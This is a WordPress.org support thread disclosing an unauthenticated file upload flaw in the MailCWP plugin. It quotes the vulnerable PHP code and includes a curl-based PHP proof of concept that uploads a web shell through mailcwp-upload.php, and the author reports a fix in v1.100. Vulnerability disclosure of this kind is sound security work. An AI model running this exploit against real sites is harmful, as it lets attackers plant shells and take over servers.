Title: Remote file upload vulnerability
Last modified: August 30, 2016

---

# Remote file upload vulnerability

 *  Resolved [larry0](https://wordpress.org/support/users/larry0/)
 * (@larry0)
 * [10 years, 10 months ago](https://wordpress.org/support/topic/remote-file-upload-vulnerability-4/)
 * Hello!
    The code in mailcwp-upload.php doesn’t check that a user is authenticated
   or what type of file is being uploaded any user can upload a shell to the target
   wordpress server:
 *  2 $message_id = $_REQUEST[“message_id”];
    3 $upload_dir = $_REQUEST[“upload_dir”];..
   8 $fileName = $_FILES[“file”][“name”]; 9 move_uploaded_file($_FILES[“file”][“
   tmp_name”], “$upload_dir/$message_id-$fileName”);
 * PoC:
 * <?php
    /*Larry W. Cashdollar @_larry0 Exploit for mailcwp v1.99 shell will be
   called 1-shell.php. 7/9/2015 */ $target_url = ‘[http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads&#8217](http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads&#8217);;
   $file_name_with_full_path = ‘/var/www/shell.php’;
 *  echo “POST to $target_url $file_name_with_full_path”;
    $post = array(‘file’ 
   => ‘shell.php’,’file’=>’@’.$file_name_with_full_path);
 *  $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,$target_url); curl_setopt($
   ch, CURLOPT_POST,1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt(
   $ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec ($ch); curl_close ($ch); echo“
   <hr>”; echo $result; echo “<hr>”; ?>
 * Thanks
    Larry
 * [https://wordpress.org/plugins/mailcwp/](https://wordpress.org/plugins/mailcwp/)

Viewing 2 replies - 1 through 2 (of 2 total)

 *  Plugin Author [Warrick](https://wordpress.org/support/users/wzedi/)
 * (@wzedi)
 * [10 years, 10 months ago](https://wordpress.org/support/topic/remote-file-upload-vulnerability-4/#post-6314025)
 * Thanks for the heads up. We’ll get onto this right away.
 *  Plugin Author [Warrick](https://wordpress.org/support/users/wzedi/)
 * (@wzedi)
 * [10 years, 10 months ago](https://wordpress.org/support/topic/remote-file-upload-vulnerability-4/#post-6314237)
 * Resolved in v1.100.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Remote file upload vulnerability’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/mailcwp_bab9b4.svg)
 * [MailCWP](https://wordpress.org/plugins/mailcwp/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/mailcwp/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/mailcwp/)
 * [Active Topics](https://wordpress.org/support/plugin/mailcwp/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/mailcwp/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/mailcwp/reviews/)

 * 2 replies
 * 2 participants
 * Last reply from: [Warrick](https://wordpress.org/support/users/wzedi/)
 * Last activity: [10 years, 10 months ago](https://wordpress.org/support/topic/remote-file-upload-vulnerability-4/#post-6314237)
 * Status: resolved